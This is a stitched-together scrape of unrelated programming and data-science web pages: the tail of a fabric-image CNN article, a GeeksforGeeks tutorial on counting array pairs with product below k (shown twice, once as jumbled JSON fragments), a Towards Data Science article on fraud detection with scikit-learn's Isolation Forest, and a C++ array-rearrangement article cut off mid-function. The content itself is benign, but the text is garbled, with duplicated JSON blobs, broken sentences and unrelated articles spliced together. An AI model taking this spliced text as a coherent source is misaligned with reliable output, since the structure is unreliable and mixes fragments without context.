scratch, using the Adam optimizer, at a learning rate of 0.00001. After 50 epochs of training, the model achieved a training accuracy of 98% and a validation accuracy of 97%." }, { "code": null, "e": 8258, "s": 7280, "text": "Since the validation data set used was too small (only 100 images), in order to further validate the model’s performance in the real world, a different set of 100 fabric images were tested using the trained model. The model predicted 97 of those images correctly. The significance of this new test sample is that, the images were taken from a completely different distribution to the original training and validation data. One set of images were downloaded off the internet (3D knitted fabric images). The other set of images were scanned using a scanner and the images were zoomed in by 50%, cropped out and resized into 224x224 pixels to feed the neural network. The fabric images of the original training and validation data sets had been captured using a photometric stereo sensor (C. Kampouris, S. Zafeiriou, A. Ghosh, S. Malassiotis, Fine-grained material classification using micro-geometry and reflectance, 14th European Conference on Computer Vision, Amsterdam, 2016)." }, { "code": null, "e": 8745, "s": 8258, "text": "It should be noted that the training data for the model consisted of weft knitted fabrics only. Only technical front images of single jersey knitted structures were available and no 3D knitted structures were included. However, the trained model was capable of correctly predicting 3D cable knitted structures and it correctly predicted some of the single jersey technical back images as well. Most of the woven fabric images in the training set consisted of plain and twill structures." }, { "code": null, "e": 9073, "s": 8745, "text": "Intermediate activations of the trained model were visualized to understand how the convolutions learn features from the fabric images. A knitted fabric image is fed to the model as the input and the corresponding layer activations are shown below. Please note that only some of the convolutions of a few layers are shown here." }, { "code": null, "e": 9673, "s": 9073, "text": "The initial layers of the model seem to be identifying the most basic features of the image, such as horizontal and vertical edges. Some of the convolutions have identified the edges of the wales on the knitted fabric surface. In the middle layers, the convolutions begin to extract much finer details such as the shape of the knitted loops and the max pooling layers are highlighting these features. The activations of the deepest layers are difficult to interpret visually, as they are encoding information specific to the fabric structure, according to what the model has learned during training." } ]
Count pairs in a sorted array whose product is less than k - GeeksforGeeks
06 May, 2021

Given a sorted integer array and a number k, the task is to count the pairs in the array whose product is less than k.

Examples:

Input: A = {2, 3, 5, 6}, k = 16
Output: 4
Pairs having product less than 16: (2, 3), (2, 5), (2, 6), (3, 5)

Input: A = {2, 3, 4, 6, 9}, k = 20
Output: 6
Pairs having product less than 20: (2, 3), (2, 4), (2, 6), (2, 9), (3, 4), (3, 6)

A simple solution to this problem is to run two loops that generate all pairs and, one by one, check whether the current pair's product is less than k or not.

An efficient solution is to keep the initial and last index values in variables l and r and consider the following two cases:

Case I: Let i < j and A[i]*A[j] < k. Then A[i]*A[j-1] < k, since A[j-1] <= A[j] in a sorted array. Similarly A[i]*A[j-2] < k, A[i]*A[j-3] < k, ....., A[i]*A[i+1] < k.

Case II: Let i < j and A[i]*A[j] > k. Then A[i]*A[j+1] > k, since A[j+1] >= A[j] in a sorted array. Similarly A[i]*A[j+2] > k, A[i]*A[j+3] > k, ....., A[i]*A[n-1] > k.

The problem is similar to "Count pairs in a sorted array whose sum is less than x"; the only difference is that we use the product of the pair instead of the sum.

Below is the algorithm to solve this problem:

1) Initialize two variables l and r to find the candidate elements in the sorted array.
   (a) l = 0
   (b) r = n - 1
2) Initialize: result = 0
3) Loop while l < r.
   // If the current left and current right elements have a
   // product smaller than k, then all elements from l+1 to r
   // form a pair with the current left element
   (a) If (arr[l] * arr[r] < k)
          result = result + (r - l)
          l++;
   (b) Else
          r--;
4) Return result

Below is the implementation of the above algorithm:

C++

// C++ program to find number of pairs with
// product less than k in a sorted array
#include <bits/stdc++.h>
using namespace std;

// Function to count the pairs
int fun(int A[], int n, int k)
{
    // count keeps the number of pairs with product less than k
    int count = 0;
    int i = 0;
    int j = n - 1;

    // Traverse the array
    while (i < j) {
        // If product is less than k, count that pair and increment 'i'
        if (A[i] * A[j] < k) {
            count += (j - i);
            i++;
        }
        // Else decrement 'j'
        else {
            j--;
        }
    }

    // Return count of pairs
    return count;
}

// Driver code
int main()
{
    int A[] = { 2, 3, 4, 6, 9 };
    int n = sizeof(A) / sizeof(int);
    int k = 20;
    cout << "Number of pairs with product less than "
         << k << " = " << fun(A, n, k) << endl;
    return 0;
}

Java

// Java program to find number of pairs with
// product less than k in a sorted array
class GFG {

    // Function to count the pairs
    static int fun(int A[], int n, int k)
    {
        // count keeps the number of pairs with product less than k
        int count = 0;
        int i = 0;
        int j = n - 1;

        // Traverse the array
        while (i < j) {
            // If product is less than k, count that pair and increment 'i'
            if (A[i] * A[j] < k) {
                count += (j - i);
                i++;
            }
            // Else decrement 'j'
            else {
                j--;
            }
        }

        // Return count of pairs
        return count;
    }

    // Driver code
    public static void main(String args[])
    {
        int A[] = { 2, 3, 4, 6, 9 };
        int n = A.length;
        int k = 20;
        System.out.println("Number of pairs with "
                           + "product less than 20 = "
                           + fun(A, n, k));
    }
}

Python

# Python program to find number of pairs with
# product less than k in a sorted array

def fun(A, k):
    # count keeps the number of pairs with product less than k
    count = 0
    n = len(A)

    # Left pointer pointing to the leftmost part
    i = 0

    # Right pointer pointing to the rightmost part
    j = n - 1

    # While the left and right pointers don't meet
    while i < j:
        if A[i] * A[j] < k:
            count += (j - i)
            # Increment the left pointer
            i += 1
        else:
            # Decrement the right pointer
            j -= 1
    return count

# Driver code to test the above function
A = [2, 3, 4, 6, 9]
k = 20
print("Number of pairs with product less than ", k, " = ", fun(A, k))

C#

// C# program to find number of pairs with
// product less than k in a sorted array
using System;

class GFG {

    // Function to count the pairs
    static int fun(int[] A, int n, int k)
    {
        // count keeps the number of pairs with product less than k
        int count = 0;
        int i = 0;
        int j = n - 1;

        // Traverse the array
        while (i < j) {
            // If product is less than k, count that pair and increment 'i'
            if (A[i] * A[j] < k) {
                count += (j - i);
                i++;
            }
            // Else decrement 'j'
            else {
                j--;
            }
        }

        // Return count of pairs
        return count;
    }

    // Driver code
    public static void Main()
    {
        int[] A = { 2, 3, 4, 6, 9 };
        int n = A.Length;
        int k = 20;
        Console.WriteLine("Number of pairs with "
                          + "product less than 20 = "
                          + fun(A, n, k));
    }
}

PHP

<?php
// PHP program to find number of pairs with
// product less than k in a sorted array

// Function to count the pairs
function fun($A, $n, $k)
{
    // count keeps the number of pairs with product less than k
    $count = 0;
    $i = 0;
    $j = ($n - 1);

    // Traverse the array
    while ($i < $j)
    {
        // If product is less than k, count that pair and increment 'i'
        if ($A[$i] * $A[$j] < $k)
        {
            $count += ($j - $i);
            $i++;
        }
        // Else decrement 'j'
        else
        {
            $j--;
        }
    }

    // Return count of pairs
    return $count;
}

// Driver code
$A = array( 2, 3, 4, 6, 9 );
$n = sizeof($A);
$k = 20;
echo "Number of pairs with product less than ",
     $k, " = ", fun($A, $n, $k), "\n";
?>

Javascript

<script>
// Javascript program to find number of pairs with
// product less than k in a sorted array

// Function to count the pairs
function fun(A, n, k)
{
    // count keeps the number of pairs with product less than k
    let count = 0;
    let i = 0;
    let j = n - 1;

    // Traverse the array
    while (i < j) {
        // If product is less than k, count that pair and increment 'i'
        if (A[i] * A[j] < k) {
            count += (j - i);
            i++;
        }
        // Else decrement 'j'
        else {
            j--;
        }
    }

    // Return count of pairs
    return count;
}

let A = [2, 3, 4, 6, 9];
let n = A.length;
let k = 20;
document.write("Number of pairs with "
               + "product less than 20 = "
               + fun(A, n, k));
</script>

Output:

Number of pairs with product less than 20 = 6

Time Complexity: O(N)
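For comparison with the two-pointer method above, the "simple solution" described earlier (checking every pair in O(n^2) time) could look like the following sketch; the function name is illustrative and not part of the original article.

# Brute-force O(n^2) count, for comparison with the two-pointer approach
def count_pairs_bruteforce(A, k):
    n = len(A)
    count = 0
    for i in range(n):
        for j in range(i + 1, n):
            # Count every pair (i, j) whose product is below k
            if A[i] * A[j] < k:
                count += 1
    return count

print(count_pairs_bruteforce([2, 3, 4, 6, 9], 20))  # prints 6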
[ { "code": null, "e": 25144, "s": 25116, "text": "\n06 May, 2021" }, { "code": null, "e": 25266, "s": 25144, "text": "Given a sorted integer array and number k, the task is to count pairs in an array whose product is less than x.Examples: " }, { "code": null, "e": 25502, "s": 25266, "text": "Input: A = {2, 3, 5, 6}, k = 16 Output: 4 Pairs having product less than 16: (2, 3), (2, 5), (2, 6), (3, 5)Input: A = {2, 3, 4, 6, 9}, k = 20 Output: 6 Pairs having product less than 20: (2, 3), (2, 4), (2, 6), (2, 9), (3, 4), (3, 6) " }, { "code": null, "e": 25773, "s": 25504, "text": "A simple solution of this problem run two loops to generate all pairs and one by one and check if current pair’s product is less than x or not.An Efficient solution of this problem is take initial and last value of index in l and r variable. Consider below two cases: " }, { "code": null, "e": 25961, "s": 25773, "text": "Case-I: Lets consider i < j and A[i]*A[j] < k then we can say that A[i]*A[j-1] < k as A[j-1] < A[j] for a sorted array, Similarly A[i]*A[j-2] < k, A[i]*A[j-3] < k, ....., A[i]*A[i+1] < k." }, { "code": null, "e": 26130, "s": 25961, "text": "Case-II: Lets consider i k then we can say that A[i]*A[j+1] > k as A[j+1] > A[j] for a sorted array, similarly A[i]*A[j+2] > k, A[i]*A[j+3] > k, ....., A[i]*A[n-1] > k." }, { "code": null, "e": 26343, "s": 26130, "text": "Above problem is similar to Count pairs in a sorted array whose sum is less than x, the only thing that is different is to find the product of pairs instead of sum. Below is the algorithm to solve this problem: " }, { "code": null, "e": 26820, "s": 26343, "text": "1) Initialize two variables l and r to find the candidate \n elements in the sorted array.\n (a) l = 0\n (b) r = n - 1\n2) Initialize : result = 0\n2) Loop while l < r.\n\n // If current left and current\n // right have product smaller than x,\n // the all elements from l+1 to r\n // form a pair with current\n (a) If (arr[l] * arr[r] < x) \n result = result + (r - l) \n l++; \n \n (b) Else\n r--;\n \n3) Return result" }, { "code": null, "e": 26870, "s": 26820, "text": "Below is the implementation of above algorithm: " }, { "code": null, "e": 26874, "s": 26870, "text": "C++" }, { "code": null, "e": 26879, "s": 26874, "text": "Java" }, { "code": null, "e": 26886, "s": 26879, "text": "Python" }, { "code": null, "e": 26889, "s": 26886, "text": "C#" }, { "code": null, "e": 26893, "s": 26889, "text": "PHP" }, { "code": null, "e": 26904, "s": 26893, "text": "Javascript" }, { "code": "// C++ program to find number of pairs with// product less than k in a sorted array#include <bits/stdc++.h>using namespace std; // Function to count the pairsint fun(int A[], int n, int k){ // count to keep count of // number of pairs with product // less than k int count = 0; int i = 0; int j = n - 1; // Traverse the array while (i < j) { // If product is less than k // then count that pair // and increment 'i' if (A[i] * A[j] < k) { count += (j - i); i++; } // Else decrement 'j' else { j--; } } // Return count of pairs return count;} // Driver codeint main(){ int A[] = { 2, 3, 4, 6, 9 }; int n = sizeof(A) / sizeof(int); int k = 20; cout << \"Number of pairs with product less than \" << k << \" = \" << fun(A, n, k) << endl; return 0;}", "e": 27797, "s": 26904, "text": null }, { "code": "// Java program to find number// of pairs with product less// than k in a sorted arrayclass GFG{ // Function to count the pairsstatic int fun(int A[], int n, int k){ // count to keep count of // number of pairs with // product less 
than k int count = 0; int i = 0; int j = n - 1; // Traverse the array while (i < j) { // If product is less than // k then count that pair // and increment 'i' if (A[i] * A[j] < k) { count += (j - i); i++; } // Else decrement 'j' else { j--; } } // Return count of pairs return count;} // Driver codepublic static void main(String args[]){ int A[] = {2, 3, 4, 6, 9}; int n = A.length; int k = 20; System.out.println(\"Number of pairs with \" + \"product less than 20 = \" + fun(A, n, k));}} // This code is contributed// by Kirti_Mangal", "e": 28789, "s": 27797, "text": null }, { "code": "# Python program to find number of pairs with# product less than k in a sorted array def fun(A, k): # count to keep count of number # of pairs with product less than k count = 0 n = len(A) # Left pointer pointing to leftmost part i = 0 # Right pointer pointing to rightmost part j = n-1 # While left and right pointer don't meet while i < j: if A[i]*A[j] < k: count += (j-i) # Increment the left pointer i+= 1 else: # Decrement the right pointer j-= 1 return count # Driver code to test above functionA = [2, 3, 4, 6, 9]k = 20print(\"Number of pairs with product less than \",k, \" = \", fun(A, k))", "e": 29496, "s": 28789, "text": null }, { "code": "// C# program to find number// of pairs with product less// than k in a sorted arrayusing System; class GFG{ // Function to count the pairsstatic int fun(int []A, int n, int k){ // count to keep count of // number of pairs with // product less than k int count = 0; int i = 0; int j = n - 1; // Traverse the array while (i < j) { // If product is less than // k then count that pair // and increment 'i' if (A[i] * A[j] < k) { count += (j - i); i++; } // Else decrement 'j' else { j--; } } // Return count of pairs return count;} // Driver codepublic static void Main(){ int []A = {2, 3, 4, 6, 9}; int n = A.Length; int k = 20; Console.WriteLine(\"Number of pairs with \" + \"product less than 20 = \" + fun(A, n, k));}} // This code is contributed// by Subhadeep", "e": 30481, "s": 29496, "text": null }, { "code": "<?php// PHP program to find number of// pairs with product less than k// in a sorted array // Function to count the pairsfunction fun($A, $n, $k){ // count to keep count of // number of pairs with product // less than k $count = 0; $i = 0; $j = ($n - 1); // Traverse the array while ($i < $j) { // If product is less than k // then count that pair // and increment 'i' if ($A[$i] * $A[$j] < $k) { $count += ($j - $i); $i++; } // Else decrement 'j' else { $j--; } } // Return count of pairs return $count;} // Driver code$A = array( 2, 3, 4, 6, 9 );$n = sizeof($A);$k = 20;echo \"Number of pairs with product less than \", $k , \" = \" , fun($A, $n, $k) , \"\\n\"; // This code is contributed by ajit?>", "e": 31329, "s": 30481, "text": null }, { "code": "<script> // Javascript program to find number // of pairs with product less // than k in a sorted array // Function to count the pairs function fun(A, n, k) { // count to keep count of // number of pairs with // product less than k let count = 0; let i = 0; let j = n - 1; // Traverse the array while (i < j) { // If product is less than // k then count that pair // and increment 'i' if (A[i] * A[j] < k) { count += (j - i); i++; } // Else decrement 'j' else { j--; } } // Return count of pairs return count; } let A = [2, 3, 4, 6, 9]; let n = A.length; let k = 20; document.write(\"Number of pairs with \" + \"product less than 20 = \" + fun(A, n, k)); </script>", "e": 32368, "s": 31329, "text": null }, { "code": null, "e": 32414, "s": 
32368, "text": "Number of pairs with product less than 20 = 6" }, { "code": null, "e": 32440, "s": 32416, "text": "Time Complexity: O(N) " }, { "code": null, "e": 32453, "s": 32440, "text": "Kirti_Mangal" }, { "code": null, "e": 32469, "s": 32453, "text": "tufan_gupta2000" }, { "code": null, "e": 32475, "s": 32469, "text": "jit_t" }, { "code": null, "e": 32489, "s": 32475, "text": "divyesh072019" }, { "code": null, "e": 32511, "s": 32489, "text": "two-pointer-algorithm" }, { "code": null, "e": 32518, "s": 32511, "text": "Arrays" }, { "code": null, "e": 32540, "s": 32518, "text": "two-pointer-algorithm" }, { "code": null, "e": 32547, "s": 32540, "text": "Arrays" }, { "code": null, "e": 32645, "s": 32547, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 32713, "s": 32645, "text": "Maximum and minimum of an array using minimum number of comparisons" }, { "code": null, "e": 32761, "s": 32713, "text": "Stack Data Structure (Introduction and Program)" }, { "code": null, "e": 32805, "s": 32761, "text": "Top 50 Array Coding Problems for Interviews" }, { "code": null, "e": 32837, "s": 32805, "text": "Multidimensional Arrays in Java" }, { "code": null, "e": 32860, "s": 32837, "text": "Introduction to Arrays" }, { "code": null, "e": 32874, "s": 32860, "text": "Linear Search" }, { "code": null, "e": 32919, "s": 32874, "text": "Python | Using 2D arrays/lists the right way" }, { "code": null, "e": 32940, "s": 32919, "text": "Linked List vs Array" }, { "code": null, "e": 32994, "s": 32940, "text": "Queue | Set 1 (Introduction and Array Implementation)" } ]
Real-time Fraud Detection With Machine Learning | by Kaushik Choudhury | Towards Data Science
Unlike our parents and grandparents, we live and breathe in the digital world. At first it was discussions on online forums, then chats and emails, and now most of our lives and financial transactions are carried out digitally. As the stakes get higher, it is not enough to detect fraud after the event: imagine someone with a few pieces of confidential information about your bank account or credit card being able to execute a fraudulent transaction. Banks and insurance companies need tools and techniques that detect fraud in real time so that they can take appropriate action.

We humans lose the ability to interpret and visualise data as we move beyond three-dimensional space. Today a financial transaction involves hundreds of parameters, such as the transaction amount, past transaction trends, the GPS location of the transaction, the transaction time, the merchant name and so on. We need to consider many parameters to detect an anomaly and fraud in real time. The isolation forest algorithm implemented in scikit-learn can help identify fraud in real time and avoid financial loss. In this article, I will discuss the step-by-step process of detecting a fraudulent transaction with machine learning.

Step 1: We need to import the packages we are going to use. We will use "make_blobs" to generate our test data and will measure the accuracy of the fitted model with accuracy_score.

from sklearn.datasets import make_blobs
from sklearn.metrics import accuracy_score
from sklearn.ensemble import IsolationForest

Step 2: In real life, we would base the model on millions or billions of past transactions and hundreds of parameters. In this article, we will consider a hundred samples and four features to understand the core concept and the process.

X, y = make_blobs(n_samples=[4, 96], centers=[[5, 3, 3, 10], [9, 3, 6, 11]], n_features=4, random_state=0, shuffle=True)

The array X holds the values of the four parameters for a hundred records, and y stores whether each record is a fraud or a normal transaction.

Step 3: We will use 300 base estimators (trees) in the ensemble and 10 samples from the dataset to train each base estimator.

clf = IsolationForest(n_estimators=300, max_samples=10, random_state=0, max_features=4, contamination=0.1).fit(X)

We will also use all four feature values (the "max_features" parameter) for the model. In real projects, feature engineering determines the importance of each parameter and establishes the list of features on which the model should be based. I will not discuss the details of feature engineering in this article; it will be covered later in a separate article. The IsolationForest model is then fitted on the sample dataset.

We set the value of the "contamination" parameter based on the proportion of anomalies in the historical data and on the stakes of missing an anomaly versus raising false alarms. Say the proportion of fraudulent transactions in the historical dataset is 0.05 % and the transactions are very high stakes. In such a scenario, we may want to set the contamination value to around 0.25 % to 0.35 %. Setting the contamination value at 5 to 7 times the anomaly proportion in the historical data helps ensure that no rogue transaction is wrongly classified as normal. Setting a contamination value that is high compared to the anomaly proportion does, however, increase the number of false alarms. If the stakes are lower, we can afford to miss a few fraudulent transactions and reduce false alarms with a lower contamination value.

Step 4: In the code below, the fitted IsolationForest model predicts whether a transaction is a fraud or a normal transaction.
IsolationForest predicts an anomaly as "-1" and a normal transaction as "1". In our sample dataset, fraud transactions are coded as "0" and normal transactions as "1".

y_pred = clf.predict(X)
y_pred[y_pred == -1] = 0

To compare the model's predictions with the actual classification in the sample dataset, we relabel the predicted fraud transactions from "-1" to "0".

Step 5: Now that fraud transactions are labelled as "0" in both the sample and the predicted set, we can measure the prediction accuracy of the model directly with the accuracy_score function.

fraud_accuracy_prediction = round(accuracy_score(y, y_pred), 2)
print("The accuracy to detect fraud is {accuracy} %".format(accuracy=fraud_accuracy_prediction*100))

The model identified the fraud transactions with 93% accuracy. The prediction accuracy may not look good enough at first glance, but remember that, as the stakes are high, we are fine with a few false alarms (false positives). These false alarms sacrifice prediction accuracy, but it is better to be ultra-safe than to miss a few fraudulent transactions.

Step 6: We will use the confusion matrix to look deeper into the predictions.

from sklearn.metrics import confusion_matrix
print(confusion_matrix(y, y_pred))

Out of the total 100 transactions in the sample dataset, the model identified all four true fraud transactions. The model labelled seven genuine transactions as fraud (false alarms) due to the contamination (safety factor) parameter of 0.1. We set the contamination value higher than the actual proportion of fraud transactions in the historical data because it is better to be safe than sorry when the stakes are high.

Step 7: We have written a small function to detect whether a new transaction is a fraud in real time. It feeds the parameter values of the new transaction into the trained model to determine the authenticity of the transaction.

def frauddetection(trans):
    transaction_type = clf.predict([trans])
    if transaction_type[0] < 0:
        print("Suspect fraud")
    else:
        print("Normal transaction")
    return

Step 8: The various transaction parameters are collected at the time of the new transaction.

frauddetection([7, 4, 3, 8])
frauddetection([10, 4, 5, 11])

The authenticity of each transaction is ascertained by calling the function defined earlier with the transaction parameters.

I have simplified a few things, such as the number of features in a transaction, the number of historical transactions used to fit the model, feature engineering and so on, to explain the core concept. We have seen how the isolation forest algorithm can help detect fraudulent transactions in real time. If you would like to know how to perform feature engineering with exploratory data analysis, read the article on Advanced Visualisation for Exploratory Data Analysis (EDA).
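As a small extension of Steps 5 and 6 above, the false-alarm trade-off can also be quantified with precision and recall for the fraud class. This sketch is illustrative and not part of the original article; with the counts quoted above (all 4 frauds caught, 7 false alarms), it would give a fraud recall of 1.0 and a precision of roughly 0.36.

from sklearn.metrics import precision_score, recall_score

# Treat the fraud class (label 0) as the positive class
recall = recall_score(y, y_pred, pos_label=0)        # share of true frauds that were caught
precision = precision_score(y, y_pred, pos_label=0)  # share of flagged transactions that were really frauds

print("Fraud recall: {:.2f}".format(recall))
print("Fraud precision: {:.2f}".format(precision))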
[ { "code": null, "e": 410, "s": 171, "text": "Unlike our parents and grandparents, we live and breathe in the digital world. Initially, it was discussions on online forums, then chats and emails, and now most of our entire life and financial transactions are executed in digital mode." }, { "code": null, "e": 743, "s": 410, "text": "As the stakes are getting higher, it is not enough to detect fraud after the event. Imagine someone with a few confidential information about your bank or credit card details, able to execute a fraudulent transaction. Banks and insurance companies need tools and techniques to detect frauds in real-time to take appropriate actions." }, { "code": null, "e": 847, "s": 743, "text": "We humans lose the sense of interpretation and visualisation as we move beyond three-dimensional space." }, { "code": null, "e": 1109, "s": 847, "text": "Today a financial transaction involves hundreds of parameters like transaction amount, past transaction trends, GPS location of the transaction, transaction time, merchant name etc. We need to consider many parameters to detect an anomaly and fraud in realtime." }, { "code": null, "e": 1338, "s": 1109, "text": "Isolation forest algorithm implemented in Scikit-Learn can help to identify the frauds in realtime and avoid financial loss. In this article, I will discuss step by step process of a fraudulent transaction with machine learning." }, { "code": null, "e": 1523, "s": 1338, "text": "Step 1: We need to import the packages which we are going to use. We will use “make_blobs” to generate our test data and will measure the accuracy of the fit model with accuracy_score." }, { "code": null, "e": 1649, "s": 1523, "text": "from sklearn.datasets import make_blobsfrom sklearn.metrics import accuracy_scorefrom sklearn.ensemble import IsolationForest" }, { "code": null, "e": 1887, "s": 1649, "text": "Step 2: In real life, we base the model based on millions and billions of past transactions and hundreds of parameters. In this article, we will consider a hundred samples and four features to understand the core concept and the process." }, { "code": null, "e": 2002, "s": 1887, "text": "X, y = make_blobs(n_samples=[4,96], centers=[[5,3,3,10],[9,3,6,11]], n_features=4, random_state=0, shuffle=\"True\")" }, { "code": null, "e": 2131, "s": 2002, "text": "The array X holds values of the four parameters for a hundred records and, y stores whether it is a fraud or normal transaction." }, { "code": null, "e": 2267, "s": 2131, "text": "Step 3: We will use 300 base estimators (trees) in the ensemble and 10 number of samples from the dataset to train each base estimator." }, { "code": null, "e": 2377, "s": 2267, "text": "clf = IsolationForest(n_estimators=300,max_samples=10,random_state=0,max_features=4,contamination=0.1).fit(X)" }, { "code": null, "e": 2802, "s": 2377, "text": "Also, we will use all four feature values (“max_feature” parameter) for the model. In projects, with feature engineering, the importance of each parameter is determined and ascertained the list of features on which model is to be based. I will not discuss the details of feature engineering in this article and will discuss it later in a separate article. The IsolationForest model is further fitted with the sample dataset." }, { "code": null, "e": 3597, "s": 2802, "text": "We set the value of the parameter “contamination” based on the proportion of the anomaly in historical data and stakes of missing anomaly against false alarms. 
Let say that proportion of fraud transaction in the historical dataset is 0.05 % and it is a very high stake transaction. In such a scenario, we may like to set the contamination value from 0.25 to 0.35. Setting the contamination value 5 to 7 times the anomaly proportion in historical data records will ensure that none of the rogue transaction is wrongly classified. Indeed setting a high contamination value compare to anomaly proportion also lead to increase few false alarms. In case the stakes are lower, then we may afford to miss to catch a few fraudulent transactions but decrease false alarms with lower contamination value." }, { "code": null, "e": 3893, "s": 3597, "text": "Step 4: In the below code, fitted IsolationForest model predicts whether a transaction is a fraud or normal transaction. IsolationForest predicts the anomaly as “-1” and normal transaction as “1”. In our sample test dataset, fraud transactions are codified as “0” and normal transactions as “1”." }, { "code": null, "e": 3939, "s": 3893, "text": "y_pred=clf.predict(X)y_pred[y_pred == -1] = 0" }, { "code": null, "e": 4096, "s": 3939, "text": "To compare the model prediction accuracy with actual classification from sample datasets, we will classify the predicted fraud transaction from “-1” to “0”." }, { "code": null, "e": 4281, "s": 4096, "text": "Step 5: As now the fraud transaction is labelled as “0 in the sample and predicted set, hence we can compare the prediction accuracy of the model directly with accuracy_score function." }, { "code": null, "e": 4445, "s": 4281, "text": "fraud_accuracy_prediction= round(accuracy_score(y,y_pred),2)print(\"The accuracy to detect fraud is {accuracy} %\" .format (accuracy=fraud_accuracy_prediction*100))" }, { "code": null, "e": 4818, "s": 4445, "text": "It seems the model identified the fraud transaction with 93% accuracy. The prediction accuracy of the model may not look good enough on first glance, but remember as the stakes are higher, hence we are ok with few false alarms (false positive). These false alarms sacrifice the prediction accuracy, but it is better to be ultra-safe than missing a few frauds transactions." }, { "code": null, "e": 4896, "s": 4818, "text": "Step 6: We will use the confusion matrix to look deeper into the predictions." }, { "code": null, "e": 4975, "s": 4896, "text": "from sklearn.metrics import confusion_matrixprint(confusion_matrix(y, y_pred))" }, { "code": null, "e": 5088, "s": 4975, "text": "Out of the total 100 transactions in sample datasets, the model could identify all four true fraud transactions." }, { "code": null, "e": 5400, "s": 5088, "text": "Model labelled seven genuine transactions as fraud (false alarm) due to contamination (safety factor) parameter of 0.1 in the model. We have set the contamination value higher than the actual proportion of the fraud transaction in historical data as it is better to be safe than sorry in case stakes are higher." }, { "code": null, "e": 5632, "s": 5400, "text": "Step 7: We have written a small function to detect whether the new transaction is a fraud in realtime. It takes the parameter values of the new transaction feeds into the trained model to detect the authenticity of the transaction." 
}, { "code": null, "e": 5818, "s": 5632, "text": "def frauddetection(trans): transaction_type=(clf.predict([trans])) if transaction_type[0] < 0: print(\"Suspect fraud\") else: print(\"Normal transaction\") return" }, { "code": null, "e": 5907, "s": 5818, "text": "Step 8: Various transaction parameters are collected at the time of the new transaction." }, { "code": null, "e": 5963, "s": 5907, "text": "frauddetection([7,4,3,8]) frauddetection([10,4,5,11])" }, { "code": null, "e": 6083, "s": 5963, "text": "The authenticity of the transaction is ascertained by calling the function defined earlier with transaction parameters." }, { "code": null, "e": 6376, "s": 6083, "text": "I have simplified a few things like the number of features in the transaction, the number of historical transaction to fit the model, feature engineering etc. to explain the core concept. We have seen the way isolation forest algorithm can help to detect fraudulent transactions in real-time." } ]
Count distinct entries in SAP BusinessObjects
Your requirement is not entirely clear, but I think you should use the AND operator and count on this in the third column. Your formula should look like this:

=([First_Seen] = 1) and ([Authorized] = 1)
[ { "code": null, "e": 1204, "s": 1062, "text": "Your requirement is not clear but I think you should use AND operator and count on this in the third column. Your formula should be like this" }, { "code": null, "e": 1247, "s": 1204, "text": "=([First_Seen] = 1) and ([Authorized] = 1)" }, { "code": null, "e": 1292, "s": 1247, "text": "Consuming Graphical calculation view via SDA" } ]
How to remove single quote from string column in an R data frame?
Sometimes column values in an R data frame have a single quote attached to them, and we need to remove that quote before performing the analysis. To remove a single quote from a string column, we can use the gsub function, passing the single quote as the pattern and replacing it with a blank string (not a space), as shown in the examples below.

Consider the below data frame −

x1<-sample(c("India'","Sudan'","Croatia'"),20,replace=TRUE)
x2<-rpois(20,5)
df1<-data.frame(x1,x2)
df1

   x1       x2
1  India'    6
2  Sudan'    3
3  Croatia'  9
4  Croatia'  3
5  Sudan'    4
6  Croatia'  4
7  India'    4
8  Croatia'  6
9  India'    4
10 Croatia'  7
11 Sudan'    8
12 India'    3
13 Croatia'  4
14 Sudan'    6
15 Sudan'    3
16 India'   11
17 Croatia'  8
18 Sudan'    6
19 Sudan'   10
20 Sudan'    5

Removing ' from column x1 in df1 −

df1$x1<-gsub("'","",df1$x1)
df1

   x1      x2
1  India    6
2  Sudan    3
3  Croatia  9
4  Croatia  3
5  Sudan    4
6  Croatia  4
7  India    4
8  Croatia  6
9  India    4
10 Croatia  7
11 Sudan    8
12 India    3
13 Croatia  4
14 Sudan    6
15 Sudan    3
16 India   11
17 Croatia  8
18 Sudan    6
19 Sudan   10
20 Sudan    5

Now consider another data frame in which the quotes surround the values −

y1<-sample(c("'A'","'B'","'C'"),20,replace=TRUE)
y2<-rnorm(20,1)
df2<-data.frame(y1,y2)
df2

   y1   y2
1  'B'  0.49282668
2  'B' -0.90061585
3  'B'  0.89346759
4  'A'  1.96469552
5  'A'  1.21931750
6  'A'  0.32022463
7  'A'  0.97912117
8  'B'  1.38781374
9  'C' -0.69066318
10 'B'  1.45014864
11 'C'  1.61876980
12 'C'  1.69046763
13 'C' -0.08073507
14 'B'  1.73212908
15 'C'  0.85473489
16 'B' -0.24975030
17 'A'  0.40313471
18 'B'  0.60537047
19 'B'  0.30200882
20 'C'  2.29497113

Removing ' from column y1 in df2 −

df2$y1<-gsub("'","",df2$y1)
df2

   y1  y2
1  B   0.49282668
2  B  -0.90061585
3  B   0.89346759
4  A   1.96469552
5  A   1.21931750
6  A   0.32022463
7  A   0.97912117
8  B   1.38781374
9  C  -0.69066318
10 B   1.45014864
11 C   1.61876980
12 C   1.69046763
13 C  -0.08073507
14 B   1.73212908
15 C   0.85473489
16 B  -0.24975030
17 A   0.40313471
18 B   0.60537047
19 B   0.30200882
20 C   2.29497113
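If several character columns carry the same stray quote, the same gsub call can be applied to all of them at once. The following is a small sketch that is not part of the original example; the data frame df is assumed to contain one or more character (not factor) columns −

# apply gsub to every character column of df
char_cols <- sapply(df, is.character)
df[char_cols] <- lapply(df[char_cols], function(col) gsub("'", "", col))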
Rearrange positive and negative numbers using inbuilt sort function - GeeksforGeeks
03 Sep, 2021

Given an array of positive and negative numbers, arrange them such that all negative integers appear before all the positive integers, without using any additional data structure like a hash table or an extra array. The order of appearance should be maintained.

Examples:

Input  : arr[] = [12, 11, -13, -5, 6, -7, 5, -3, -6]
Output : arr[] = [-13, -5, -7, -3, -6, 12, 11, 6, 5]

Input  : arr[] = [-12, 11, 0, -5, 6, -7, 5, -3, -6]
Output : arr[] = [-12, -5, -7, -3, -6, 0, 11, 6, 5]

Previous Approaches: Some approaches have already been discussed here.

Approach 3: There is another method to do so. The C++ STL provides the built-in function std::sort(), and we can supply a custom comp() function to obtain the desired result: negative numbers must come first, then positive numbers, and any zeroes (if present) should stay between the negative and the positive numbers.

The comp() function in this code rearranges the given array in the required order. In bool comp(int a, int b), if integer 'a' is at the j-th index and integer 'b' is at the i-th index of arr[], then j > i; comp() is called in this way, and a swap is performed whenever it returns true.

C++

// CPP program to rearrange positive
// and negative integers keeping
// order of elements.
#include <bits/stdc++.h>

using namespace std;

bool comp(int a, int b)
{
    // swap not needed
    if ((a > 0 && b > 0) || (a < 0 && b < 0) || (a > 0 && b < 0))
